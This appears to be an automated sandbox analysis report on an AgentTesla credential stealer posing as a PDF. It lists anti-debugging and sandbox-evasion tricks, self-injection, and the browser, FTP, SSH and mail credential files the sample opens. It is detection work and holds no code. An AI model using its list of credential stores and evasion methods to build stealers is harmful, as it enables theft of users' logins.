                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 3080Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 1547Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow / User API: threadDelayed 8247Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 455Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 2903Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 399Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 2121
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1169
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 8261
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow / User API: threadDelayed 1524
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 3080 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 223 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 7044Thread sleep count: 223 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172Thread sleep count: 1547 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6172Thread sleep count: 8247 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe TID: 6180Thread sleep count: 48 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 455 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 2903 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 5832Thread sleep count: 399 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696Thread sleep count: 2121 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 4696Thread sleep count: 1169 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972Thread sleep count: 8261 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6972Thread sleep count: 1524 > 30
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe TID: 6124Thread sleep count: 43 > 30
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: NewApp.exe, 00000018.00000002.923839104.0000000006230000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: WerFault.exe, 0000000B.00000003.700535576.0000000004BD4000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886267678.0000000004BF4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: WerFault.exe, 0000000B.00000002.703491956.0000000004C80000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.705986735.00000000051E0000.00000002.00000001.sdmp, A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.918554184.0000000005F50000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.703525513.0000000004E80000.00000002.00000001.sdmp, NewApp.exe, 00000012.00000002.846768409.00000000055D0000.00000002.00000001.sdmp, NewApp.exe, 00000013.00000002.847227235.0000000004B80000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.918863074.00000000058E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging:

                      barindex
                      Contains functionality to hide a thread from the debuggerShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E992E0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,00E99F4F,00000000,000000000_2_00E992E0
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B8460 LdrInitializeThunk,8_2_067B8460
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeMemory written: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeMemory written: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess created: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeProcess created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.914746965.00000000017D0000.00000002.00000001.sdmp, NewApp.exe, 00000018.00000002.915456140.00000000012F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
